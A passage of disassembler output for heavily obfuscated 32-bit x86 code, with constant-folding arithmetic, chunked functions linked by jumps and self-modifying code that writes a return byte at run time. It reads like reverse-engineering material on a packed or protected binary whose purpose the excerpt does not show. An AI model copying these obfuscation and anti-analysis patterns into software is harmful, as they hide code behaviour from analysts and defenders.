; FUNCTION CHUNK AT 004452B6 SIZE 0000000E BYTES
push ebx
push 9D5D522h
pop ebx
or ebx, 1A26ACC3h
jmp loc_443661
sub_43FF2B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_43FF3D: ; CODE XREF: sub_43BBF3:loc_44A94Aj
jl loc_4570D4
loc_43FF43: ; CODE XREF: sub_4459EE:loc_4522FEj
jmp loc_450691
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_43FF48: ; CODE XREF: sub_43E6CC+13B0Aj
jmp loc_439F16
; END OF FUNCTION CHUNK FOR sub_43E6CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441501
loc_43FF4D: ; CODE XREF: sub_441501+12j
jmp loc_453633
; END OF FUNCTION CHUNK FOR sub_441501
; ---------------------------------------------------------------------------
jl loc_454728
jmp loc_4570C8
; ---------------------------------------------------------------------------
shl eax, 0Bh
jmp loc_448566
; =============== S U B R O U T I N E =======================================
sub_43FF65 proc near ; CODE XREF: ut7h7i2x:0043CD3Ej
; sub_44B72F:loc_44FD03p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043994A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439EE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A3CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BC85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BFE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C390 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CD1F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DE13 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EE1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F6D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004400A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441C5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442400 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443970 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444351 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004459E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445C52 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445CD3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004462DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044698B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004479C1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447A12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448581 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B8BC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BB72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BFDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C50D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044DDE3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044DE17 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044DE87 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E2F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F459 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FD09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451303 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451F63 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045256A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004527D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453547 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453776 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004539CF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453CB3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455151 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00455FC2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00456FA5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045717C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458F83 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004593A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC0B SIZE 00000017 BYTES
xchg edx, [esp+0]
pop edx
jb loc_4539CF
push eax
jmp loc_43F6D2
sub_43FF65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
loc_43FF75: ; CODE XREF: sub_449957:loc_43D34Aj
pop ebx
or ebx, 0F371638Ch
add ebx, 4516E91h
xchg ebx, [esp+4+var_4]
jmp loc_455640
; END OF FUNCTION CHUNK FOR sub_449957
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458C95
loc_43FF8A: ; CODE XREF: sub_458C95:loc_44784Fj
xchg edx, [esp+0]
mov ebp, edx
xchg ebp, [esp+0]
push eax
mov eax, edx
call sub_445DB4
; END OF FUNCTION CHUNK FOR sub_458C95
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_43FF9A: ; CODE XREF: sub_444EAA+14083j
jmp loc_44CFA1
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EFC4
loc_43FF9F: ; CODE XREF: sub_43EFC4+12j
xchg eax, [esp+0]
jmp loc_44C3E7
; END OF FUNCTION CHUNK FOR sub_43EFC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4587DD
loc_43FFA7: ; CODE XREF: sub_4587DD+7j
push offset loc_43C9DE
jmp nullsub_346
; END OF FUNCTION CHUNK FOR sub_4587DD
; =============== S U B R O U T I N E =======================================
sub_43FFB1 proc near ; DATA XREF: sub_459BF0:loc_43BA8Eo
; FUNCTION CHUNK AT 0044CD40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045042B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045044D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045536D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045842B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458B49 SIZE 00000005 BYTES
push ecx
push 573B8D1Ch
pop ecx
or ecx, 5FDEAEA4h
sub ecx, 0C521F9F4h
rol ecx, 4
jmp loc_44CD40
sub_43FFB1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_43FFCC: ; CODE XREF: sub_44445F:loc_4449F9j
xor edi, 0E44598C7h
call sub_452802
; END OF FUNCTION CHUNK FOR sub_44445F
; START OF FUNCTION CHUNK FOR sub_44941C
loc_43FFD7: ; CODE XREF: sub_44941C-371j
jmp nullsub_129
; END OF FUNCTION CHUNK FOR sub_44941C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_310. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43FFDD: ; CODE XREF: sub_4433C5+C2E1j
jns loc_442967
shr esi, 8
sbb edx, ebp
xchg esi, edi
jmp loc_44A1B0
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_43FFEF: ; CODE XREF: sub_4544E6-6A20j
cmp eax, ds:dword_43C444
jz loc_44F4B4
loc_43FFFB: ; CODE XREF: sub_4544E6-71BBj
; ut7h7i2x:loc_44DAB4j
jnb loc_45307D
mov eax, [ebp-4]
jmp loc_43AE92
; END OF FUNCTION CHUNK FOR sub_4544E6
; =============== S U B R O U T I N E =======================================
sub_440009 proc near ; CODE XREF: sub_44DF79+C87Dj
push ebx
xchg esi, [eax]
ror ebx, 10h
sub_440009 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_44000F: ; CODE XREF: sub_44DF79:loc_45A7EAj
add ebx, 320D86EEh
sub ebx, 0C7970EAFh
xor ebx, 0ECAFDBD9h
jmp loc_4484FE
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
loc_440026: ; CODE XREF: ut7h7i2x:0044F573j
jz loc_44211B
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_44002C: ; CODE XREF: sub_44D5BE:loc_440A61j
sub edx, 0FF5CE1B2h
add edx, 0E5419671h
call sub_43A0C7
loc_44003D: ; CODE XREF: sub_44EBA8+AE4Dj
jmp loc_44A4DB
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
loc_440042: ; DATA XREF: sub_441989+18o
add eax, 978B4192h
call sub_43AA94
mov ds:off_41D08C, eax
lea eax, sub_456EE0
jmp loc_45938D
; ---------------------------------------------------------------------------
mov ecx, 6CBCD6E8h
jmp sub_456FB3
; ---------------------------------------------------------------------------
push offset loc_44CD2B
jmp locret_452A35
; ---------------------------------------------------------------------------
locret_440072: ; CODE XREF: ut7h7i2x:0043984Cj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445B34
loc_440073: ; CODE XREF: sub_445B34+C158j
jmp nullsub_136
; END OF FUNCTION CHUNK FOR sub_445B34
; ---------------------------------------------------------------------------
push eax
ror eax, 0Dh
push ecx
push 50C0806Bh
pop ecx
add ecx, 0AE92D6F6h
jmp loc_440CE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B8F8
loc_44008E: ; CODE XREF: sub_44B8F8+Cj
mov [ebp+var_8], edx
call sub_44E8DE
loc_440096: ; CODE XREF: ut7h7i2x:00453BA5j
jmp nullsub_81
; END OF FUNCTION CHUNK FOR sub_44B8F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_44009B: ; CODE XREF: sub_446ACE-668Ej
jmp loc_4410B2
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_4400A0: ; CODE XREF: sub_45742F-1A9C8j
jmp loc_44C244
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4400A5: ; CODE XREF: sub_43FF65:loc_43EE1Bj
cmp esi, 5D1EC33Ah
jmp loc_43C390
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4572A7
loc_4400B0: ; CODE XREF: sub_4572A7+11j
push offset loc_43A488
jmp locret_453E97
; END OF FUNCTION CHUNK FOR sub_4572A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_4400BA: ; CODE XREF: sub_4549F0:loc_43F88Ej
and eax, ebp
xor eax, 0D30A6F1Dh
jge loc_4578B5
jl loc_45419E
jmp loc_44F81F
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E16
loc_4400D3: ; CODE XREF: sub_442E16j
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
push offset sub_44A998
jmp loc_44E316
; END OF FUNCTION CHUNK FOR sub_442E16
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4400E4: ; CODE XREF: sub_44445F+1247Aj
jmp loc_441309
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_4400E9: ; CODE XREF: sub_44C87F-14FEj
jmp loc_4545C6
; END OF FUNCTION CHUNK FOR sub_44C87F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444D26
loc_4400EE: ; CODE XREF: sub_444D26+Bj
jmp loc_43A265
; END OF FUNCTION CHUNK FOR sub_444D26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_4400F3: ; CODE XREF: sub_439B67+A808j
jmp loc_456314
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
loc_4400F8: ; CODE XREF: ut7h7i2x:loc_4566CBj
add edi, ebp
add edi, 5A8EE3C9h
mov [edi], eax
pop edi
cmp dword ptr [ebp-4], 0
jz loc_456C0D
jmp loc_44516D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_440112: ; CODE XREF: sub_439BF8+1FBFDj
add eax, 4
push edx
push 8D9154ACh
pop edx
or edx, 0DB3A4F0Ah
rol edx, 17h
jb loc_43BC29
; END OF FUNCTION CHUNK FOR sub_439BF8
; START OF FUNCTION CHUNK FOR sub_44101A
loc_44012B: ; CODE XREF: sub_44101A+5FC0j
jmp loc_457050
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
shr edi, 0Bh
jmp loc_450B57
; ---------------------------------------------------------------------------
loc_440138: ; CODE XREF: ut7h7i2x:00455623j
xchg eax, esi
loc_44013A: ; CODE XREF: ut7h7i2x:loc_43DC4Aj
push eax
lea eax, loc_453CCE+2
push eax
jmp loc_4560B0
; ---------------------------------------------------------------------------
mov ebp, eax
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_440149: ; CODE XREF: sub_4406F1+1658Fj
jmp sub_451B75
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44014E: ; CODE XREF: sub_448321-180Cj
xor ecx, ebx
loc_440150: ; CODE XREF: ut7h7i2x:00450BB3j
cdq
loc_440151: ; CODE XREF: sub_448321-1818j
add eax, 93E21371h
call sub_43AA94
mov ds:off_41D0B4, eax
lea eax, loc_43B47E
mov byte ptr [eax], 0C3h
jmp loc_459617
; END OF FUNCTION CHUNK FOR sub_448321
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_440171: ; CODE XREF: sub_44E5DC-6C82j
jmp loc_43D997
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
push 6CE4B9FBh
sbb eax, edi
jmp sub_44E8F3
; ---------------------------------------------------------------------------
loc_440182: ; DATA XREF: sub_449B8E-74A6o
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_448B14
jmp loc_43D71E
; ---------------------------------------------------------------------------
loc_440193: ; CODE XREF: ut7h7i2x:0045956Ej
or eax, 9188C497h
sub eax, 0D50EED6Ch
rol eax, 12h
test eax, 40000000h
jmp loc_43B93F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_4401AD: ; CODE XREF: sub_43AE1A:loc_43A174j
xor ecx, 63020E7Ah
add ecx, 54FB0E61h
xchg ecx, [esp+0]
jmp loc_459589
; END OF FUNCTION CHUNK FOR sub_43AE1A
; =============== S U B R O U T I N E =======================================
sub_4401C1 proc near ; CODE XREF: ut7h7i2x:0043EEC1j
; sub_45633E-12A12p
xchg eax, [esp+0]
pop eax
push esi
push 5F590747h
pop esi
xor esi, 8C8451D5h
add esi, 2C67E683h
xchg esi, [esp+0]
jmp sub_43AED9
sub_4401C1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_4401E0: ; CODE XREF: sub_44A3BB:loc_43A473j
push offset sub_445EDA
jmp nullsub_448
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443459
loc_4401EA: ; CODE XREF: ut7h7i2x:loc_448B73j
; sub_443459:loc_45241Cj
xor eax, 23441E9Dh
add eax, ebp
push ebx
push 7C271E6Dh
pop ebx
jmp loc_4500E6
; END OF FUNCTION CHUNK FOR sub_443459
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449AD9
loc_4401FF: ; CODE XREF: sub_449AD9+D567j
jmp loc_450330
; END OF FUNCTION CHUNK FOR sub_449AD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_440204: ; CODE XREF: sub_451F39-6D91j
jmp loc_44CBB2
; END OF FUNCTION CHUNK FOR sub_451F39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_440209: ; CODE XREF: sub_43DD17+41E9j
jge loc_457152
and ebx, 0FA0C73A9h
cmp edi, 0AECAC06Ah
jmp loc_457146
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_440220: ; CODE XREF: sub_44B43D+A4F6j
jl loc_459BC2
shl esi, 1Ah
pop esi
jmp loc_43B3FA
; END OF FUNCTION CHUNK FOR sub_44B43D
; =============== S U B R O U T I N E =======================================
sub_44022F proc near ; CODE XREF: ut7h7i2x:0043A382j
; sub_4474B1-798Bp
; FUNCTION CHUNK AT 00448A92 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459D3C SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push edx
push eax
loc_440235: ; CODE XREF: sub_4474B1+20B5j
mov eax, [ebp-18h]
add eax, eax
cdq
jmp loc_459D3C
sub_44022F endp
; ---------------------------------------------------------------------------
loc_440240: ; CODE XREF: ut7h7i2x:loc_440CE2j
add eax, 0FF309FCCh
mov eax, [eax]
call sub_448CDC
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44024D: ; CODE XREF: sub_43A556+1EA7Aj
rol eax, 16h
add eax, ds:4000F6h
or eax, 3F610E93h
xor eax, 38623395h
jmp loc_45A22D
; END OF FUNCTION CHUNK FOR sub_43A556
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_246. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC28
loc_440268: ; CODE XREF: sub_44EC28:loc_451F1Ej
add edx, 0F83411FBh
push offset loc_43CDE9
jmp nullsub_282
; END OF FUNCTION CHUNK FOR sub_44EC28
; ---------------------------------------------------------------------------
and ebp, 62F37D63h
jmp sub_458C95
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_440283: ; CODE XREF: sub_44CAB9:loc_43BA99j
jz loc_45A0C5
jmp loc_44D240
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
loc_44028E: ; CODE XREF: ut7h7i2x:loc_443B0Aj
jnz loc_44DD09
mov esi, 0F7E0F04h
jmp loc_44DD07
; ---------------------------------------------------------------------------
jo loc_4582BE
cdq
; =============== S U B R O U T I N E =======================================
sub_4402A5 proc near ; CODE XREF: ut7h7i2x:00446D0Dp
; FUNCTION CHUNK AT 004390AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B75E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043EF49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441240 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044338B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004460C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A48D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C185 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453754 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453880 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045547F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459E29 SIZE 00000007 BYTES
xchg eax, [esp+0]
pop eax
test al, al
jz loc_43B75E
jmp loc_43EF49
sub_4402A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_4402B6: ; CODE XREF: sub_443BC5:loc_4563FBj
mov [ecx], eax
xchg edx, [esp+0]
mov ecx, edx
pop edx
jmp loc_454346
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_4402C3: ; CODE XREF: sub_444029-8984j
; sub_444029+94Aj
push 0ABE30996h
jmp loc_456BC7
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_4402CD: ; CODE XREF: ut7h7i2x:0045AAA1j
jge loc_455274
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_4402D3: ; CODE XREF: sub_443C4A-7D51j
jmp loc_4578E9
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
adc esi, ebx
and edx, 708B626Bh
loc_4402E0: ; CODE XREF: ut7h7i2x:loc_44ADDAj
mov ebp, 2B6E7C07h
popf
jmp loc_455274
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_4402EB: ; CODE XREF: sub_449700:loc_447500j
jge loc_452645
loc_4402F1: ; CODE XREF: sub_43D021+16714j
jmp loc_4422F0
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4402F6: ; CODE XREF: sub_43D021+FA0Ej
jmp loc_4570A5
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
add ebx, ecx
jmp loc_448917
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_440302: ; CODE XREF: sub_43A556+83B7j
sbb ecx, esi
push edx
pushf
jmp loc_43EE42
; ---------------------------------------------------------------------------
loc_44030B: ; CODE XREF: sub_43A556:loc_441F49j
cmp dword ptr [ebp-4], 4
jnz loc_43EE42
jmp loc_43FEDE
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
add ebp, 88E6D439h
jmp sub_440BA2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_430. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_440326: ; CODE XREF: sub_43CE34+196C8j
jmp loc_43CA75
; END OF FUNCTION CHUNK FOR sub_43CE34
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44032C: ; CODE XREF: ut7h7i2x:0044812Dj
jmp loc_444B7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_440331: ; CODE XREF: sub_44CE09:loc_4408A6j
xchg ecx, [esp+4+var_4]
jmp loc_43B80E
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_440339: ; CODE XREF: sub_44BF76:loc_43BBA3j
mov eax, [ecx]
jns loc_45A7D0
pop eax
jmp loc_44A4F0
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
mov [ebx], edi
sbb esi, eax
cmp esi, 0B5765D4Eh
jmp loc_449888
; ---------------------------------------------------------------------------
loc_440356: ; CODE XREF: ut7h7i2x:0044D2F5j
or esi, ebp
; =============== S U B R O U T I N E =======================================
sub_440358 proc near ; CODE XREF: ut7h7i2x:004458EBp
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
mov eax, [esp-4+arg_0]
call sub_459C87
sub_440358 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44D3B0
loc_440364: ; CODE XREF: sub_44D3B0+Fj
push eax
mov eax, [ebp-14h]
push offset sub_44A3BB
jmp loc_43F9AA
; END OF FUNCTION CHUNK FOR sub_44D3B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_440372: ; CODE XREF: sub_439BD1:loc_4504DCj
jz loc_458F79
jmp loc_456694
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_44037D: ; CODE XREF: sub_43BA9E+420Aj
jl loc_44AF82
xor ecx, edx
test ebx, 0DB1B2BC9h
jmp loc_43D60F
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_440390: ; CODE XREF: sub_44DD39+18j
jz loc_43FBD4
loc_440396: ; CODE XREF: ut7h7i2x:0044EF48j
jmp sub_43BA59
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_44039B: ; CODE XREF: sub_4417AF+65C5j
jmp loc_44A65D
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
loc_4403A0: ; CODE XREF: ut7h7i2x:0043F0FAj
jmp loc_444781
; ---------------------------------------------------------------------------
push esi
adc edi, 9F1E6075h
jmp loc_43FBCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_4403B1: ; CODE XREF: sub_43F0B0:loc_43CE0Cj
push esi
; END OF FUNCTION CHUNK FOR sub_43F0B0
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4403B2: ; CODE XREF: sub_43F1B2:loc_44BF57j
adc ecx, 0EA205EBAh
loc_4403B8: ; CODE XREF: ut7h7i2x:loc_445F49j
mov [edi], ecx
jz loc_43F501
add esi, 143F3AECh
jmp loc_43FAB4
; END OF FUNCTION CHUNK FOR sub_43F1B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_414. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_4403CC: ; CODE XREF: sub_441765:loc_4588ADj
call sub_43D797
; END OF FUNCTION CHUNK FOR sub_441765
; START OF FUNCTION CHUNK FOR sub_43A556
loc_4403D1: ; CODE XREF: sub_43A556+A029j
; ut7h7i2x:004505AAj ...
jns loc_446700
lea eax, [ebp-20h]
mov dword ptr [eax], 70736957h
push offset loc_44ED6C
jmp loc_43A179
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
jnb loc_445328
jmp sub_44986A
; ---------------------------------------------------------------------------
xor eax, 4FF65363h
push offset sub_459B87
jmp loc_450C68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_440405: ; CODE XREF: sub_450FDE:loc_442711j
pop edi
add edi, 708740D6h
xor edi, 0AFD35EE4h
add edi, ebp
add edi, 9D705572h
jmp loc_43A6CA
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_44041F: ; CODE XREF: sub_452361-13F59j
jge loc_43A24E
loc_440425: ; CODE XREF: sub_439788+1F7F6j
jmp loc_4527EE
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
jz loc_44BC94
jmp loc_43A24C
; ---------------------------------------------------------------------------
loc_440435: ; CODE XREF: ut7h7i2x:0043DAC0j
adc ebx, ecx
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_440437: ; CODE XREF: sub_446ACE-9021j
add esi, 733C8F30h
xchg esi, [esp+4+var_4]
jmp loc_44009B
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_440445: ; CODE XREF: sub_44B01F:loc_43E6E6j
mov ebx, edx
xchg ebx, [esp+4+var_4]
call sub_43F7A5
mov eax, 0B4B93D2h
call sub_43AA94
jmp loc_444B90
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_44045E proc near ; CODE XREF: ut7h7i2x:00449939p
; ut7h7i2x:004550C3j
xchg eax, [esp+0]
pop eax
pop ecx
pop ecx
call near ptr loc_43B268+3
sub_44045E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44865D
loc_440469: ; CODE XREF: sub_44865D-395Ej
jmp loc_439F35
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4423AE
loc_44046E: ; CODE XREF: sub_4423AE+Ej
pop ecx
rol edi, 18h
add edi, 0D43D8DDFh
popf
xchg edi, [esp+4+var_4]
jmp sub_459036
; END OF FUNCTION CHUNK FOR sub_4423AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_440482 proc near ; CODE XREF: ut7h7i2x:loc_45A4DAj
; DATA XREF: sub_43CCC3+9960o
var_4 = dword ptr -4
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
call sub_454196
retn
sub_440482 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_44048E: ; CODE XREF: sub_43A0C7+19B18j
jmp nullsub_175
; END OF FUNCTION CHUNK FOR sub_43A0C7
; =============== S U B R O U T I N E =======================================
sub_440493 proc near ; CODE XREF: ut7h7i2x:004421A5p
; sub_44E688-6718p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A0F1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EDF1 SIZE 00000005 BYTES
